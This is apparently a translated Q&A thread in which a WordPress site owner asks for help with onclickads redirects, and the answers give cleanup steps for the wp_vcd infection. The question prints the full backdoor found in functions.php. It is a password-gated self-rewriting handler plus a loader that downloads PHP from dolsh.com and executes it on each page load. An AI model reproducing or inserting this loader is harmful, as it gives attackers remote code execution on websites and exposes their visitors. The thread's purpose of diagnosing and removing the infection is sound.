Я не знаю, если это код onlickads каждый раз, когда я нажимаю некоторые ссылки на моем сайте, он перенаправляет меня на ссылки onclickads.com.
Каждый раз, когда я удаляю этот код из моей темы functions.php, он будет генерировать этот код снова и снова .. когда я проверяю исходный файл функций темы, этот код не включается.
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f82a07ebbdf814988becaa9c78ce0ffb'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code8\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
if ( ! function_exists( 'w1p_te1mp_se1tup' ) ) {
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if ( ! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
if($tmpcontent = @file_get_contents("http://www.dolsh.com/code8.php?i=".$path))
{
function w1p_te1mp_se1tup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), "w1p_te1mp_se1tup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
extract(w1p_te1mp_se1tup($tmpcontent));
}
}
}
?>
Любой может посоветовать, что делать или что удалит вредоносное ПО на моем сайте,
Благодарю вас.
4 ответа
Это перенаправление onclickads.com обычно вызывается рекламным ПО, установленным на вашем компьютере. Эти рекламные программы поставляются в комплекте с другим бесплатным программным обеспечением, которое вы загружаете из Интернета.
Возможно, вам не нужно устанавливать новую версию, и вы можете удалить этот тип предупреждений с вашего сайта с помощью следующих шагов.
Чтобы удалить перенаправление onclickads.com, выполните следующие действия.
1) Удален ненужный код из вашего файла.
2) удалить вредоносные программы из Windows
3) Используйте программное обеспечение безопасности в вашей системе, а также используйте плагин безопасности в вашем WordPress, например Антиспам или Wordfence
После выполнения этих действий все равно ничего не работает, тогда вы можете установить новую версию и установить плагин безопасности со своим новым, чтобы избежать взлома в будущем.
Надеюсь, это поможет вам. Спасибо.
Вот полное подробное решение о том, как исправить эту вредоносную атаку, которую я нашел после поиска решения для моих атакованных сайтов
https://github.com/rakshitshah94/wordpress- сор - VCD - вредоносная атака - решение
Чтобы полностью удалить код, если вы используете дочернюю тему, вы должны одновременно удалить ее из родительской темы.
Что я сделал, чтобы решить проблему:
- В каталоге
wp-includeудалите файлыwp-vcd.phpиclass.wp.php - В каталоге
wp-includeоткройтеpost.phpи удалите первый тегphp, добавленныйMalware - Откройте файл
functions.phpтемы и удалите приведенные выше коды
Похожие вопросы
Новые вопросы
php
PHP является широко используемым, высокоуровневым, динамическим, объектно-ориентированным и интерпретируемым языком сценариев, в первую очередь предназначенным для серверной веб-разработки. Используется для вопросов о языке PHP.